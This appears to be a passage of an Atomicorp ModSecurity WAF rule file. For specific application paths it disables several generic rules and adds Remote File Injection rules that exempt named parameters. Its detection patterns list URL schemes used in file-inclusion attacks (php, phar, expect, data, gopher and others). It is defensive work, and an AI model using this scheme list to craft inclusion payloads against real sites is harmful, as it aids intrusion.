SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:site_path "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340629,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:site_path "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340630,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91201

SecRule REQUEST_FILENAME "/shopadmin/core\.php" "phase:2,id:91202,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91203,t:none,pass,nolog,skipAfter:END_RULES_91203"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:offer_copyright|!ARGS:offerDomain|!ARGS:con|!ARGS:offer_contactus|!ARGS:content|!ARGS:mail_content|!ARGS:reply "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340631,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:offer_copyright|!ARGS:offerDomain|!ARGS:con|!ARGS:offer_contactus|!ARGS:content|!ARGS:mail_content|!ARGS:reply "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340632,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91203

SecRule REQUEST_FILENAME "/system/index\.php" "phase:2,id:91204,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91205,t:none,pass,nolog,skipAfter:END_RULES_91205"

SecRule ARGS|!ARGS:/location/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^template/|!ARGS:/^field_id/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "capture,deny,log,auditlog,status:403,id:340633,phase:2,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/location/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^template/|!ARGS:/^field_id/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "capture,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340634,phase:2,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91205

SecRule REQUEST_FILENAME "/mailer/truefm\.php" "phase:2,id:91206,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91207,t:none,pass,nolog,skipAfter:END_RULES_91207"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:forward|!ARGS:body_tag|!ARGS:http_referer|!ARGS:Address|!ARGS:Comment "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340635,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:forward|!ARGS:body_tag|!ARGS:http_referer|!ARGS:Address|!ARGS:Comment "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340636,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91207

SecRule REQUEST_FILENAME "/ummmanager\.cgi" "phase:2,id:91208,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91209,t:none,pass,nolog,skipAfter:END_RULES_91209"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:login "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340637,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:login "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340638,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91209

SecRule REQUEST_FILENAME "/install/step6\.php" "phase:2,id:91210,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91211,t:none,pass,nolog,skipAfter:END_RULES_91211"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^site_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340639,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^site_/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340640,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91211

SecRule REQUEST_FILENAME "/homecounter\.php" "phase:2,id:91212,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340024,ctl:ruleRemovebyID=340028,ctl:ruleRemovebyID=340151"

SecRule REQUEST_FILENAME "/admincp/options\.php" "phase:2,id:91213,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91214,t:none,pass,nolog,skipAfter:END_RULES_91214"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:site_path|!ARGS:/^setting/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340641,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:site_path|!ARGS:/^setting/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340642,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91214

SecRule REQUEST_FILENAME "/media/hochron\.html" "phase:2,id:91215,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91216,t:none,pass,nolog,skipAfter:END_RULES_91216"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:MemberSelectList "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340643,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:MemberSelectList "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340644,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91216

SecRule REQUEST_FILENAME "/admin/settings/index\.php" "phase:2,id:91217,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91218,t:none,pass,nolog,skipAfter:END_RULES_91218"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/|!ARGS:metaDescription "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340645,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/|!ARGS:metaDescription "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340646,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91218

SecRule REQUEST_FILENAME "/cmspopouts/shortcuts\.php" "phase:2,id:91219,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91220,t:none,pass,nolog,skipAfter:END_RULES_91220"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:target_title "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340647,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:target_title "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340648,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91220

SecRule REQUEST_FILENAME "/manufacturers_edit\.php" "phase:2,id:91221,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91222,t:none,pass,nolog,skipAfter:END_RULES_91222"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^edit/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340649,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^edit/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340650,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91222

SecRule REQUEST_FILENAME "/admin/contactmanage\.php" "phase:2,id:91223,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91224,t:none,pass,nolog,skipAfter:END_RULES_91224"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:response "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340651,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:response "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91224

SecRule REQUEST_FILENAME "/giftcert\.php" "phase:2,id:91225,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91226,t:none,pass,nolog,skipAfter:END_RULES_91226"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:recipient_address "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340653,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:recipient_address "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340654,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91226

SecRule REQUEST_FILENAME "/pages/news\.htm" "phase:2,id:91227,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91228,t:none,pass,nolog,skipAfter:END_RULES_91228"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:store "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340655,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:store "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340656,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91228

SecRule REQUEST_FILENAME "/bb-login\.php" "phase:2,id:91229,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91230,t:none,pass,nolog,skipAfter:END_RULES_91230"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:re|!ARGS:_wp_http_referer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340657,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:re|!ARGS:_wp_http_referer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340658,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91230

SecRule REQUEST_FILENAME "/adview\.php" "phase:2,id:91231,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91232,t:none,pass,nolog,skipAfter:END_RULES_91232"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:target1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340659,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:target1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340660,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91232

SecRule REQUEST_FILENAME "/ajcart/cart\.php" "phase:2,id:91233,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91234,t:none,pass,nolog,skipAfter:END_RULES_91234"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:CARTDIR "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340661,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:CARTDIR "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340662,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91234

SecRule REQUEST_FILENAME "/index\.php/install/-/configure" "phase:2,id:91235,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91236,t:none,pass,nolog,skipAfter:END_RULES_91236"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:DIR_REL "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:341661,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:DIR_REL "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341662,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91236

SecRule REQUEST_FILENAME "/store/zc_install/index\.php" "phase:2,id:91237,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin_config\.php" "phase:2,id:91238,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91239,t:none,pass,nolog,skipAfter:END_RULES_91239"

